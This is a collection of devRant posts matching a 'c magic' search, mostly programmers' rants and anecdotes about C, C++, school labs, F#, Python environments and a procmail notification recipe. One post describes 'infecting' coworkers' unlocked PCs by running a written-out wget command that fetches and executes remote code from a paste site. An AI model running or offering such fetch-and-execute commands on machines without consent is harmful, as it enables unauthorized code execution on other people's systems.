Search - "c magic"

-

In one of our first C programming classes today in college, I booted up Ubuntu on the dual boot systems to practice our first few programs which we were supposed to be doing in Turbo C on Windows.

I successfully compiled it using gcc on the first try, which appeared like magic to my neighbor. Soon our teacher came to check my program and said that I had made a mistake. I asked her what the mistake was. She said that I was supposed to be using conio.h!!

I argued that it is not a standard header file and that using it makes the code non-portable. She tried to edit it to include conio.h but couldn't, since I was using vim. I was asked to switch to Windows and use Turbo C instead, and also use conio.h. I refused, and she told me to do as she said or leave the class.

The weather was nice.

-

So, I sign up for devrant and read all about the school devops fuckery everyone seems to have.

The only problem is, the computers at my school's lab have no internet access and only a pirated copy of.... Visual Studio *6*. Hell, that's 5 years older than I am.

No python, no git, nothing. The best part, you ask? They use VS6 just for teaching 9th graders Visual Basic, and for C and C++, they use TurboC++ in DOSBox. 25-year-old software. They teach us pre-ANSI C++.

No fucking wonder people from here re-learn everything on the job. I jumped the gun and started messing with basic C++ in 7th grade, and then had to go back and remember that 25 years ago, they used <iostream.h> instead of just <iostream>.

Everyone just saves their code in the TC/BIN folder in DOS too, making it more of a chaotic mess than anything ever imaginable.

Bringing your own device? Too bad that's against the school rules.

The fact that they went out of their damn way to make me use TurboC in DOSBox on Windows 7 instead of giving me a sane Linux install with an editor and GCC is just... ugh.

My classmates all think I work magic, while all I really do is simple logic. Schools here in India are almost universally terrible.

Well, it's a good thing I started learning it on my own, because if I thought programming was in any way similar to how they try to teach it to us, I would've given up a long time ago.

-

I had this prepared in advance and executed it on April 1st a few years ago.

1. I wrote an app in Python that would autostart itself, listen to UDP multicast and spam the screen with message boxes once a special "magic" UDP broadcast kicked in. The app had minimal dependencies and used native libs for the GUI to achieve this.

2. I posted this app source code on sprunge.us and remembered the short URL.

3. Once one of my coworkers left their PC unlocked, I opened their terminal and executed '$(wget -c sprunge.us/ASDF)' and closed the terminal as if nothing happened. I infected almost all machines this way.

4. On April 1st I got to my office, opened the terminal, sent a magic UDP broadcast packet and enjoyed the chaos.

Man, that was hilarious.

-



I just released a tiny game for iPhone!

It's basically an attempt to mix 'Heroes of Might & Magic' and mtg.

In the screenshot my terminal says 'helloworld.cpp'. That's right, this is my first C++ program and I don't care how crappy you think this game is, I'm super proud of myself!

I've always worked in data science where managers assume I know how to code because there's text on my screen and I can query and wrangle data, but I actually didn't know what a class was until like 3 years into my job.

Making this game was my attempt to really evolve myself away from just statistics / data transforms into actual programming. It took me forever but I'm really happy I did it.

It was brutal at first using C++ instead of R/Python that data science people usually use, but now I start to wonder why it isn't more popular. Everything is so insanely fast. You really get a better idea of what your computer is actually doing instead of just standing on engineers' shoulders. It's great.

After the game was 90% finished (LOL) I started using Swift and SpriteKit to get the visuals on the screen and working on iPhone. That was less fun. I didn't understand how to use Xcode at all or how to keep writing tests, so I stopped doing TDD because I was '90% done anyway' and 'surely I'll figure out how to do basic debugging'. I'll know better next time...

-

Fuck it. I'm tired. Anybody found me a rich husband? I'm ready to assume the role of a trophy wife.

1. Still no recommendation letter. My PhD application is hanging by a thread. If I were such an intolerable ass, someone could've at least told me. Or at least told me "no" when I asked them to write these damn letters.

2. I turned down a job offer, cuz a) the offered salary was below market average for that role at that level, b) the guy who was supposed to be my senior and the only other person on the team gave the vibe that he disliked me, and c) I asked the PM a simple question about what his expectations of the product were for the next three to six months and didn't get a solid answer. (Can't do magic tricks)

So I turned it down cuz I don't want to get stuck in another's swamp. (Been there, done that!)

3. I'm running out of ideas for the comic I was working on. As well, the backgrounds of drawings proved to be an absolute hassle. Gah.

4. So, the next switch is to the barista role. I have signed up for a lackey/intern/assistant role which starts in about two weeks. Wish me luck cuz if this doesn't work out I'm all out of ideas. Like, literally don't know what I'm doing with my life anymore. Which will make those who are jealous of me really happy, but I shouldn't make my life about what doesn't make enemies and frenemies happy, right?

-

That would probably be implementing multithreading in shell scripts.

https://gitlab.com/netikras/bthread

The idea (though not the project itself) was born back when I still was a sysadmin. Maintaining 30k servers 24/7 was quite something for a team of merely ~14 people. That includes 1st line support as well.

So I built a script to automate most of my BAU chores. You could feed it a list of servers (tens or hundreds or more) and execute the same action on each of them (actions could be custom or predefined in the list of templates). Neither Puppet nor Chef nor Ansible nor anything of the sort was consistently deployed in that zoo, not to mention that the corp processes made using those tools even slower than the manual approach, so I needed my own solution.

The problem was the timing. I needed all those commands to execute on all the servers. However, as you might expect, some servers could be frozen, others could be in a DMZ, some could be long decommed (and not removed from the listings), etc. And these buggers would cause my solution to freeze for longer than I'd like. Not to mention that running something like `sar -q 1 10` on 200 servers is quite time-consuming in itself :)

And how do I get that output neatly and consistently? (That's not something you'd easily get by moving the task to the background with '&'. And even with that you would not know when all the iterations are complete!)

So many challenges...

I started building the threading solution that would

- execute all the tasks in parallel

- not write anything to disk

- assign a title to each of the tasks

- wait for all the tasks to complete in either

> the same sequence as started

> as soon as the task finishes

- keep track of each task's

> return code

> output

> command

> sequence ID

> title

- execute post-finish actions (e.g. print to the console) for each of the tasks -- all the tracked properties are to be accessible by the post-finish actions.

The biggest challenges were:

a) how do I collect all that output without trashing my filesystems?

b) how do I synchronize all those tasks?

c) how do I make the inception possible (threads creating threads that create their own threads and so on).
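For comparison, the requirement list above can be sketched in a higher-level language. This is a minimal Python sketch and not how bthread itself does it; the names `TaskResult`, `run_task` and `run_all`, the 30-second timeout and the worker count are all assumptions made up for illustration. Output is captured in memory through pipes, so nothing is written to disk.

```python
import subprocess
from concurrent.futures import ThreadPoolExecutor, as_completed
from dataclasses import dataclass


@dataclass
class TaskResult:
    seq_id: int      # position in the submitted task list
    title: str
    command: list
    returncode: int
    output: str      # stdout and stderr combined, held in memory only


def run_task(seq_id, title, command, timeout=30):
    """Run one command and capture everything it prints (hypothetical helper)."""
    try:
        proc = subprocess.run(
            command,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            text=True,
            timeout=timeout,
        )
        return TaskResult(seq_id, title, command, proc.returncode, proc.stdout)
    except subprocess.TimeoutExpired:
        # A frozen or unreachable host must not stall the whole batch.
        return TaskResult(seq_id, title, command, -1, f"timed out after {timeout}s")


def run_all(tasks, in_order=True, on_finish=print, max_workers=32):
    """Run (title, command) pairs in parallel; call on_finish for each result."""
    results = []
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        futures = [
            pool.submit(run_task, seq_id, title, command)
            for seq_id, (title, command) in enumerate(tasks)
        ]
        # Either walk the futures in submission order, or take each one
        # as soon as it completes.
        for future in (futures if in_order else as_completed(futures)):
            result = future.result()
            on_finish(result)  # post-finish action sees all tracked properties
            results.append(result)
    return results
```

A call could look like `run_all([("web01 load", ["ssh", "web01", "sar -q 1 10"])], in_order=False)`, where `web01` is a placeholder host name. Nested "threads creating threads" are not covered by this sketch.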

Took me some time, but I finally got there and created the libbthread library. It utilizes file descriptors, subshells and some piping magic to concentrate the output while keeping track of all the tasks' properties. I now use it extensively in my new tools - the ones where I can't use already existing tools and can't use higher-level languages.

-

I could bitch about XSLT again, as that was certainly painful, but that’s less about learning a skill and more about understanding someone else’s mental diarrhea, so let me pick something else.

My most painful learning experience was probably pointers, but not pointers in the usual sense of `char *ptr` in C and how they’re totally confusing at first. I mean, it was that too, but in addition it was how I had absolutely none of the background needed to understand them, no learning material (nor guidance), and not even a typical compiler to tell me what I was doing wrong. On top of all of that, I could only run code on a device that would crash/halt/freak out whenever I made a mistake. It was an absolute nightmare.

Here’s the story:

Someone gave me the game RACE for my TI-83 calculator, but it turned out to be an unlocked version, which means I could edit it and see the code. I discovered this later on by accident while trying to play it during class, and when I looked at it, all I saw was incomprehensible garbage. I closed it, and the game no longer worked. Looking back I must have changed something, but then I thought it was just magic. It took me a long time to get curious enough to look at it again.

But in the meantime, I ended up playing with these “programs” a little, and made some really simple ones, and later some somewhat complex ones. So the next time I opened RACE I kind of understood what it was doing.

Moving on, I spent a year learning TI-Basic, and eventually reached the limit of what it could do. Along the way, I learned that all of the really amazing games/utilities that were incredibly fast, had greyscale graphics, lowercase text, no runtime indicator, etc. were written in “Assembly,” so naturally I wanted to use that, too.

I had no idea what it was, but it was the obvious next step for me, so I started teaching myself. It was z80 Assembly, and there were practically no documents, resources, or anything else helpful online.

I found the specs, and a few terrible docs and other sources, but with only one year of programming experience, I didn’t really understand what they were telling me. This was before stackoverflow, etc., too, so what little help I found was mostly from forum posts, IRC (mostly got ignored or made fun of), and reading other people’s source when I could find it. And usually that was less than clear.

And here’s where we dive into the specifics. Starting with so little experience, and in TI-Basic of all things, meant I had zero understanding of pointers, memory and addresses, the stack, heap, data structures, interrupts, clocks, etc. I had mastered everything TI-Basic offered, which astoundingly included arrays and matrices (six of each), but it hid everything else except basic logic and flow control. (No, there weren’t even functions; it has labels and goto.) It has 27 numeric variables (A-Z and theta, which can store either float or complex numbers), 8 lists (numeric arrays), 6 matrices (2D numeric arrays), 10 strings, and a few other things like “equations” and literal bitmap pictures.

Soo… I went from knowing only that to learning pointers. And pointer math. And data structures. And pointers to pointers, and the stack, and function calls, and all that goodness. And remember, I was learning and writing all of this in plain Assembly, in notepad (or on paper at school), not in C or C++ with a teacher, a textbook, SO, and an intelligent compiler with its incredibly helpful type checking and warnings. Just raw trial and error. I learned what I could from whatever cryptic sources I could find (and understand) online, and applied it.

But actually using what I learned? If a pointer was wrong, it resulted in unexpected behavior, memory corruption, freezes, etc. I didn’t have a debugger, an emulator, etc. I had notepad, the barebones compiler, and my calculator.

Also, iterating meant changing my code, recompiling, factory resetting my calculator (removing the battery for 30+ sec) because bugs usually froze it or corrupted something, then transferring the new program over, and finally running it. It was soo slowwwww. But I made steady progress.

Painful learning experience? Check.

Pointer hell? Absolutely.

-

First rant: but I'm so triggered and everyone needs a break from all the EU and PC rants.

It's time to defend JavaScript. That's right, the best frikin language in the universe.

Features:

incredible async code (await/async)

universal support on almost everything connected to the internet

runs on almost all platforms including natively

dynamically interpreted but also internally compiled (like Perl)

gave birth to JSON (you're welcome ppl who remember that the X in AJAX stood for XML)

All these people ranting about JS don't understand that JS isn't frikin magic. It does what it needs to do well.

If you're using it for compute-heavy machine learning, or to maintain a 100k LOC project without Typescript, then why'd you shoot yourself in the foot?

As a proud JS developer I gotta scroll through all these posts gushing over the other languages. Why does nobody rant about using Python for bitcoin mining or Erlang to create a media player?

Cuz if you use the wrong tool for the right job, it's of course gonna blow up in your face.

For example, there was a post claiming JS developers were "scared" of multithreading and only stick in their comfort zone. Like WTF when NodeJS came out everything was multithreaded. It took some brave developers to step out of the comfort zone to embrace the event loop.

For a web app, things like PHP and Node should only be doing light transforms between the database information and HTML anyways. You get one thread to handle the server because you're keeping other threads open to interface with databases and the filesystem. The Nexus.js dev is ranting at all us JS devs and doesn't realize that nobody's actual web server is CPU bound because of writing HTML bodies; that's why we only use 1 thread. We use other worker threads to do the heavy lifting (yes, there is a C++ bridge, look it up).

Anyways TL;DR plz respect JS developers we're people too. ES7 is magic and please don't shit on ES3 or we'll start shitting on the Python 2-3 conversion (need to maintain an outdated binary just cuz people leave out ()'s in their print statements)

Or at least agree that VB.NET is an abomination and insult to the beauty that is TI-84 BASIC

-

I wrote a prototype for a program to do some basic data cleaning tasks in Go. The idea is to just distribute the files with the executable on our shared network to our team (since it is small enough, no github bullshit needed for this) and they can go from there.

Felt experimental, so I decided to try out F# since I have always been interested in it and for some reason Microsoft adopted it into their core .NET framework.

I shit you not, from 185 lines of Go code, separated into proper modules etc not to mention the additional packages I downloaded (simple things for CSV reading bla bla)

To fucking 30 lines of F# that could probably be condensed more if I knew how to do PROPER functional programming. The actual code is very much procedural with very basic functional composition, so it could probably be even less, just more "dense"

I am amazed really. I do not like that namespace pollution happens all over F# since importing System.IO gives you a bunch of shit that you wouldn't know where it is coming from unless you fuck enough with Ionide and the docs. But man.....

No need for dotnet run to test this bitch, just highlight it on the IDE, alt enter and WHAM you have the repl in front of you, incremental quasi like Lisp changes on the code can be REPL changed this way, plethora of .NET BCL wonders in it, and a single point of documentation as long as you stay in standard .net

I am amazed and in love, plus finding what I wanted to do was a fucking cakewalk.

Downside: I work in a place in which Python is seen as magic and PHP, VB.NET and C# are the end all be all of languages. If I go away or die there will be no one else on this side of the state to fuck with F#.

This language needs to be studied more. Shit can be so compact, but I do feel that one needs to really know enough of functional programming to be good at it. It is really not a pure language like Haskell (then again, haskell is the only "mainstream" pure functional language ain't it not?) but still, shit is really nice and I really dig what Microhard is doing in terms of the .net framework.

Will provide later findings. My entire team is on the Microsoft space, we do have Linux servers, but porting the code to generate the necessary executables for those servers if needed should be a walk in the park. I am just really intrigued by how many lines of code I was able to cut down from the Go application.

Please note that this could also mean that I am a shit Golang dev, but the savings from cutting down the nil err checks do have to come from somewhere.

-

OK, so our teacher (who is supposed to be something like a professional dev or whatever) assigned us homework for Christmas (I don't care, I can complete his assignments in like 10 minutes max). We have to do some simple shit in C++, just some loops and input + output. Nothing hard. He challenged me to write it as short as possible, so I did. My classmates have code around 60 to 70 lines long (after proper formatting). I made it 20 lines long using some pointer magic and stuff like that. I tried my code, it ran fucking perfectly, so I sent it to him.

He replied that the code does not work. I tried to recompile it and it ran perfectly. Again, it does not work. After 13 fucking emails he fucking finally sent me the error message. Some function was not found (missing some library, but literally everywhere else it works without it...). That's strange, because it ran perfectly on my Fedora with CLion, so I switched to Windows and tried to run the same code in Visual Studio (which we are using in school btw). Works perfectly. So I started arguing with the teacher more and more. I tried around 10 online compilers. Works fucking everywhere.

Teacher is pissed, me too. So I rewrote my whole code, added comments and shit, reinvented the wheel literally everywhere. Now I have C99 standardised code over 370 lines long that runs even on a fucking Arduino after changing the input/output methods so it can work with it. It (surprisingly) runs on his PC too.

After a bit more arguing, he said that he is using CodeBlocks from fucking 2015. Wow. Just fucking wow. Even our school has some old Visual Studio (2007 I guess) and it worked there.

-

Long rant ahead.. 5k characters pretty much completely used. So feel free to have another cup of coffee and have a seat 🙂

So.. a while back this flash drive was stolen from me, right. Well it turns out that other than me, the other guy in that incident also got to the police 😃

Now, let me explain the smiley face. At the time of the incident I was completely at fault. I had no real reason to throw a punch at this guy and my only "excuse" would be that I was drunk as fuck - I've never drank so much as I did that day. Needless to say, not a very good excuse and I don't treat it as such.

But that guy and whoever else it was that he was with, that was the guy (or at least part of the group that did) that stole that flash drive from me.

Context: https://devrant.com/rants/2049733 and https://devrant.com/rants/2088970

So that's great! I thought that I'd lost this flash drive and most importantly the data on it forever. But just this Friday evening as I was meeting with my friend to buy some illicit electronics (high voltage, low frequency arc generators if you catch my drift), a policeman came along and told me about that other guy filing a report as well, with apparently much of the blame now lying on his side due to him having punched me right into the hospital.

So I told the cop, well most of the blame is on me really, I shouldn't have started that fight to begin with, and for that matter not have drunk that much, yada yada yada.. anyway he walked away (good grief, as I was having that friend on visit to purchase those electronics at that exact time!) and he said that this case could just be classified then. Maybe just come along next week to the police office to file a proper explanation but maybe even that won't be needed.

So yeah, great. But for me there's more in it of course - that other guy knows more about that flash drive and the data on it that I care about. So I figured, let's go to the police office and arrange an appointment with this guy. And I got thinking about the technicalities for if I see that drive back and want to recover its data.

So I've got 2 phones, 1 rooted but reliant on the other one that's unrooted for a data connection to my home (because Android Q, and no bootable TWRP available for it yet). And theoretically a laptop that I can put Arch on it no problem but its display backlight is cooked. So if I want to bring that one I'd have to rely on a display from them. Good luck getting that done. No option. And then there's a flash drive that I can bake up with a portable Arch install that I can sideload from one of their machines but on that.. even more so - good luck getting that done. So my phones are my only option.

Just to be clear, the technical challenge is to read that flash drive and get as much data off of it as possible. The drive is 32GB large and has about 16GB used. So I'll need at least that much on whatever I decide to store a copy on, assuming unchanged contents (unlikely). My Nexus 6P with a VPN profile to connect to my home network has 32GB of storage. So theoretically I could use dd and pipe it to gzip to compress the zeroes. That'd give me a resulting file that's close to the actual usage on the flash drive in size. But just in case.. my OnePlus 6T has 256GB of storage but it's got no root access.. so I don't have block access to an attached flash drive from it. Worst case I'd have to open a WiFi hotspot to it and get an sshd going for the Nexus to connect to.
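The dd-into-gzip idea can be sketched in a few lines. This is only an illustration in Python, assuming read access to the source (a block device needs root) and a made-up function name `image_device`; it streams the source in chunks so the whole 32GB never has to fit in memory. Compression only helps for regions that really are zeros or otherwise repetitive; encrypted or random-looking data will not shrink.

```python
import gzip
import shutil


def image_device(source_path, dest_path, chunk_size=4 * 1024 * 1024):
    """Copy source_path into a gzip-compressed image at dest_path.

    Roughly the same idea as `dd if=SOURCE | gzip > DEST`: the source is
    read sequentially in chunks and compressed on the fly.
    """
    with open(source_path, "rb") as src, gzip.open(dest_path, "wb") as dst:
        shutil.copyfileobj(src, dst, chunk_size)
```

Something like `image_device("/dev/block/sda", "/sdcard/flashdrive.img.gz")` would be the call, with both paths being placeholders rather than the real device names on either phone.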

And there we have it! A large storage device, no root access, that nonetheless can make use of something else that doesn't have the storage but satisfies the other requirements.

And then we have things like parted to read out the partition table (and if unchanged, cryptsetup to read out LUKS). Now, I don't know if Termux has these and frankly I don't care. What I need for that is a chroot. But I can't just install Arch x86_64 on a flash drive and plug it into my phone. Linux Deploy to the rescue! 😁

It can make chrooted installations of common distributions on arm64, and it comes extremely close to actual Linux. With some Linux magic I could make that able to read the block device from Android and do all the required sorcery with it. Just a USB-C to 3x USB-A hub required (which I have), with the target flash drive and one to store my chroot on, connected to my Nexus. And fixed!

Let's see if I can get that flash drive back!

P.S.: if you're into electronics and worried about getting stuff like this stolen, customize it. I happen to know one particular property of that flash drive that I can use for verification, although it wasn't explicitly customized. But for instance in that flash drive there was a decorative LED. Those are current limited by a resistor. Factory default can be say 200 ohm - replace it with one with a higher value. That way you can without any doubt verify it to be yours. Along with other extra security additions, this is one of the things I'll be adding to my "keychain v2".

-

So I set up push notifications from my Raspberry Pi to my Android phone, to know when exim sent a mail locally.

The easy part was the actual push notifications.

The more tedious part turned out to be looking for a way to send a notification for each mail.

After some research, Procmail seemed to be the only fitting tool to pass info to a command (in order to give the push notification some content so I know what's up)

In the middle of everything, I managed to fuck up exim system-wide, so mails didn't work, which was fucking great of course...

The magic recipe is this:

:0 c
| ${NOTIFY} -t "Pi mail: $SUBJECT"
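The recipe relies on `NOTIFY` and `SUBJECT` being set elsewhere in the procmailrc, which isn't shown here. Since procmail pipes the whole message to the command on stdin, the command could also pull the subject out itself. A rough Python sketch of that part, where the function name `notification_title` and the fallback text are assumptions and the actual push call is left out:

```python
from email import message_from_string
from email.header import decode_header, make_header


def notification_title(raw_message, prefix="Pi mail: "):
    """Build a notification title from the Subject header of a raw mail."""
    message = message_from_string(raw_message)
    subject = message.get("Subject", "(no subject)")
    # Decode RFC 2047 encoded words (e.g. =?utf-8?...?=) into readable text.
    return prefix + str(make_header(decode_header(subject)))
```

A script used in place of `${NOTIFY}` would read the mail with `sys.stdin.read()`, pass it to `notification_title`, and hand the result to whatever sends the push.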

Anyway, this is the result (using a test mail by mdadm + an actual degraded array I am still waiting on replacement drives for):

-

I once had a class mate who argued that coding in C not only produced faster code than .NET C#, but that he could actually produce applications faster than me in C.

I challenged him to make a Web browser. While he was struggling to remember if it was #include <stdio.h> or #include <iostream>, I started typing WebBro... and let IntelliSense work its magic.

Needless to say I won.

Sadly, he wouldn't admit his defeat but went on about how much faster his browser would run in the end...

He has yet to release a Web browser written completely in C.

-

!rant

The more I learn about advanced C++ the more I love this language. C++'s template system is so insanely cool!

Just made a proof of concept expression templates based linear algebra library for my own projects. It was actually a lot of fun to make, and seeing it spit out optimized, loop-fused code with no temporary variables...magic.

Long live C++.

-

C is like an obsidian razor. Extremely sharp tool, immense power with immense responsibility. You can make art and you can make bloody mess.

Clojure is like a magic rainbow mist. You accept it and it's pure chrysalis, everything is good, everything is fine. You feel cared about, you feel like nothing can hurt you.

Bash is like feeling your stepdad's finger inside your asshole. Shame and shame again combined with extreme perception of wrongdoing that leads to nothing but psychological trauma.

-

Running a fucking conda environment on windows (an update environment from the previous one that I normally use) gets to be a fucking pain in the fucking ass for no fucking reason.

First: Generate a new conda environment, for FUCKING SHITS AND GIGGLES, DO NOT SPECIFY THE PYTHON VERSION, just to see compatibility, this was an experiment, expected to fail.

Install tensorflow on said environment: It does not fucking work, not detecting cuda, the only requirement? To have the cuda dependencies installed, modified, and inside of the system path, check done, it works on 4 other fucking environments, so why not this one.

Still doesn't work, google around and found some thread on github (the errors) that has a way to fix it, do it that way, fucking magic, shit is fixed.

Very well, tensorflow is installed and detecting cuda, no biggie. HAD TO SWITCH TO PYTHON 3.8 BECAUSE 3.9 WAS GIVING ISSUES FOR SOME UNKNOWN FUCKING REASON

Ok no problem, done.

Install jupyter lab, which in all 4 other environments works the first time. Guess what: a fuckload of errors upon executing the import of tensorflow. They go on a loop that does not fucking end.

The error: imPoRT eRrOr thE Dll waS noT loAdeD

Ok, fucking which one? who fucking knows.

I FUCKING HATE that the main language for this fucking bullshit is python. I get the benefits of the repl, I do, but the python repl is fucking HORSESHIT compared to the one you get on: Lisp, Ruby and fucking even NODE, in which error messages are still more fucking intelligent than those of fucking bullshit ass Python.

Personally? I am betting on Julia devising a smarter environment, it is a better language already, on a second note: If you are worried about A.I taking your job, don't, it requires a team of fucktards working around common basic system administration tasks to get this bullshit running in the first place.

My dream? Julia or Scala (fuck you) for a primary language in machine learning and AI, in which entire environments, with aaaaaaaaaall of the required dlls and dependencies, can be downloaded, installed and then just fucking run. A single directory structure in which shit just fucking works (reason why I like live environments like Smalltalk, but fuck you on that too) and just run your projects from there, without setting a bunch of bullshit from environment variables, cuda dlls installation phases and what not. Something that JUST FUCKING WORKS.

I.....fucking.....HATE the level of system administration required to run fucking anything nowadays, the reason why we had to create shit like devops jobs, for the sad fuckers that have to figure out environment configurations on a box just to run software.

Fuck me man, development turned to shit, this is why go mod, node npm, php composer strict folder structure pipelines were created. Bitch all you want about npm, but if I can create a node_modules setting with all of the required dlls to run a project, even if this bitch weighs 2.5GB for a project structure, you bet your fucking ass that I would.

"YOU JUST DON'T KNOW WHAT YOU ARE DOING" YES I FUCKING DO and I will get this bullshit fixed, I will get it running just like I did the other 4 environments that I fucking use, for different versions of cuda and python and the dependency circle jerk BULLSHIT that I have to manage. But this "follow the guide and it will work, except when it does not and you are looking into obscure github errors" bullshit just takes away from valuable project time when you have a small dedicated group of developers and no sys admin or devops mastermind to resort to.

I have successfully deployed:

Java

Golang

Clojure

Python

Node

PHP

VB/C# .NET

C++

Rails

Django

Projects, and every single fucking time (save for .net, that shit just fucking works on a dedicated windows IIS server) the shit will not work with x..nT reasons. It fucking obliterates me how fucking annoying this bullshit is. And the reason why the ENTIRE FUCKING FIELD of computer science and software engineering is so fucking flawed.

But we can't all just run to simple windows bs in which we have documentation for everything. We have to spend countless hours on fucking Linux figuring shit out (fuck you also, I have been using Linux since I was 18, I am 30 now) for which graphical drivers for machine learning, cuda and whatTheFuckNot require all sorts of sys admin gymnastics to be used.

Y'all fucked up a long time ago. Smalltalk provided an all in one, easily rollable back to previous images, easily administered interfaces for this fileFuckery bullshit, and even though the JVM and the .NET environments did their best to hold shit down, and even though we had npm packages pulling the universe inside, or gomod compiling shit into one place NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO we had to do whatever the fuck we wanted to feel l337 and wanted.

Fuck all of you, fuck this field, fuck setting boxes for ML/AI and fuck every single OS in existence.

-

I can agree to shit when presented with hardcore data, data that proves me wrong. But when people go by opinions and then hold them as truth because "many feel the same way", I cannot help but giggle a bit.

Most issues I have found with programming stacks come from opinions rather than hard data. If a bunch of people dislike a tool but it delivers, I get to distinguish two things: (1) it performs as needed, but it is bad because of design problems etc., or (2) some dude made a post about why he thinks it is bad and sheep mentality follows.

If technologies were without merit, then we would have all discarded C++ a long time ago cuz Linus disliked it, a powerful programmer indeed, but a FOCUSED one, meaning, one that deals with 1 domain (kernel development)

Do I care about what Linus thinks about web development? No, lol, he is a better kernel developer than I am, but I highly, grossly doubt that he knows enough about web development to give me something to think about.

all languages have faults, regardless of what point of view we look at them, but completely disregarding a tech stack because of shit that you saw some fucktard wrote about, benefits and otherwise, just seems....well...sheepish, there might very well be a tech stack out there that covers everything, to me it is a mixture of things, and I use them as I please and feel like, but this is because after years of learning I have read about quirks and pitfalls and how to avoid them. I would suggest you all do the same, by you all I mean those of high opinions that can't be deflected.

This field is far too wide and concentrated to go ahead and think in absolutes when even the fundamental mathematical theory behind computer science is not absolute whatsoever. It is akin to magic: shit works, but it might not, the incantation might be right, but circuits and electricity have a way of telling us to go fuck ourselves, so do architectures, specifically ones based on physics.3 -

Am I the only one who enjoys learning low-level languages like C/C++ and absolutely hates Java (seriously FUCK Java so much I hate using it)

Working with pointers and just having the compiler completely explode in your face because you forgot a semicolon or an index out of bounds maybe a bracket just disappeared and you are frustrated but then you fix it and voila it works like magic.

Maybe it's just a thing of mine because C++ was the first programming language I learned and I miss this feeling of hopelessness (I think I might have done BDSM fetishes) and it makes me feel nostalgic.

When I was first learning them all I thought about was how cool this stuff is.19 -

!rant

How to earn a lot of money as a programmer?

So this question might sound a little naive and too simple, but earning a lot of money is what we all want after all right? Collecting experiences from people in the business should be a good idea.

So this is the position I am in:

I am a German student in my 13th year of school (which means I will graduate this summer) and I am very interested in information technology. I know C++ pretty well by now and I have already built a rendering engine for a game I want to make using OpenGL, which I am very proud of.

I would love to turn this passion into my profession and that's why I plan to attend a dual course of computer science next year (dual means that I will be employed at a company (or similar) in parallel to the studying course).

But what direction should I be going in if I want to make big money later on? I am ready to spend a lot of time and work on this life project but I don't know which directions are the most promising. I hate being a tiny gear in a huge machine that just has to keep spinning to keep the machine alive, I want to be part of a real project (like most people probably) and possibly sell a product (because I think that is how you really make money).

Now I know there is no magic answer to this, but I bet many people here have experiences they can share, and this could help a lot of people direct their path in a more success-oriented way.

I personally am especially interested in fields which are relatively low-level and close to memory (C++), go hand in hand with physics and 3D simulation and are somewhat creative and allow new solutions. (These are no hard lines, I just thought I should give a little direction to what I know already and what I am interested in)

But really, I am interested in any work you are likely to earn a lot of money with.15 -

It is the time for the proper long personal rant.

I'm a fresh student, I started a few months ago and life is going as predicted: badly or even worse...

Before university I had similar problems, but I had them under control (I was able to cope with them, and with some dose of "luck" I graduated from high school and managed to get into uni). I thought that by leaving town and starting over I would change myself and give myself a boost to keep going. But things turned out as expected. Currently I waste time every day playing PC games or, if I'm too stressed to play, I watch YT videos. A few years ago I thought I was addicted; I'm not. It might be an effect of something greater. I have plans for countless inventions and projects, personal, for university and others, and ALL of them are frozen, stopped, nonexistent. No motivation. I had a few moments when I was motivated, but they were short, hours or only minutes. Long-term goals don't give me any motivation. They give as much short-lived joy and happiness as goals in games and other things... (no substance abuse problems, don't worry). I just don't see the point of my projects anymore. I'm sure that my projects are the only thing that will give me experience and teach me something but... I passed the magic barrier of university, and all my projects are becoming less and less impressive... TV and other sources show people, brilliant people, students, even children who were more successful than me

If they are better than me, why do I even bother? Companies care more about them, especially the prestigious ones; they have all the fame, money, funding, help, gear without question!

Of course they worked hard for their positions; they could have had a better beginning or a worse one, but only hard work matters, right?

As I said. None of my work matters. I have worked hard my whole life, studying, crafting, understanding: programming, multiple languages, environments, proper and most efficient algorithms, electronic circuits, mechanical contraptions. I have knowledge about nearly every machine and I would be able to create nearly everything with just access to those tools and a few days' worth of practice. (I'm a sort of omnibus, know everything.) But because I lived in a small town I didn't have any chance of getting the right equipment. All of my electronics projects are crap. Mechanical projects are made out of scrap. Even when I was in high school, nobody was impressed, or if they were, they couldn't help me.

Now I'm at university. My projects are stagnant, mostly because of my mental problems. Even my lifestyle took a big hit. I neglect a lot of things I shouldn't. Of course, Greg, you should go out with friends! You can't dedicate 100% of your life to science!

I fucking tried. All of them are busy or there are other things that prevent that... So no friends for me. I even tried doing something together! Nope, same reasons, or in most cases they don't even do anything...

Science clubs? Mostly formal, nobody has time, tools are limited unless you designed your thing beforehand... (I want to learn! I don't have time to design!), and in addition to that I have to make a recruitment project... => lack of motivation to do shit.

The biggest obstacle is money. Parts require money; you can make your own parts, but tools cost money too. I have enough to live in a decent apartment and cook decently as well, but not enough to buy shit for projects. (Some of them require a lot, or knowledge... and nobody is willing to give me the second thing.) OK, I found a decent job opportunity. C# corporation, very nice location, perfect for me because I have a lot of time; not only can I practice but I can earn money for stuff. I have a CV or resume just waiting for my friend to give me the email (long story, we have been to that corp because they had open days and only he has the email of the guy, just an easier way)

But there are issues with it as well, so it is not that easy.

If nobody has noticed, I'm dedicated to science. Basically a 100% scientist who wants to make the world a better place.

I messaged a uni specialist, so I hope he will be able to help me.

For a long time I thought that I was normal; my parents were neglecting my mental health and I had some situations that didn't have a good influence on me either. I might have some issues with my brain as well: 96% of Asperger's symptoms match, with other links included. I don't want to say I have it, but it is an excuse for a test. In addition to that, I can't, CAN'T stop thinking; I even tried not thinking for a few minutes, nope, I had to think about something every time. On top of that my biological clock is flipped. I go to sleep at 5 am and wake up at 5 pm (when I don't have lectures).

I prefer working at night; at that time my brain at least works normally, but I don't want to disturb my roommates...

And during the day my brain starts the usual: depression, lack of motivation, other bullshit.

I might add something later, that is all for now. -

GIT COMMIT LOG VERSION 011

-------------------------

4cc7d0d Derp, asset redirection in dev mode

6b6e213 Lock S-foils in attack position

1e44549 I am even stupider than I thought

2f6bec9 You should have trusted me.

891851a To those I leave behind, good luck!

3367d77 Update .gitignore

46d6b0f Merging the merge

b12f6fe First Blood

0598e4f 8==========D

9151ff4 Finished fondling.

3a0ec1e ...

8358c20 c&p fail

bc1e834 magic, have no clue but it works

31bb17a I don't get paid enough for this shit.

21edb91 :(:(

7a71610 Stephen rebase plx?

2060661 Copy-paste to fix previous copy-paste

21ac5d2 Handled a particular error.

2dedd90 pam anderson is going to love me.

c3d4c83 omg what have I done?

d38bafd Herping the derp derp (silly scoping error)

e461773 Merge pull request #67 from Lazersmoke/fix-andys-shit Fix andys shit

1faf82b Is there an award for this?

1f6e3f3 Feed. You. Stuff. No time.
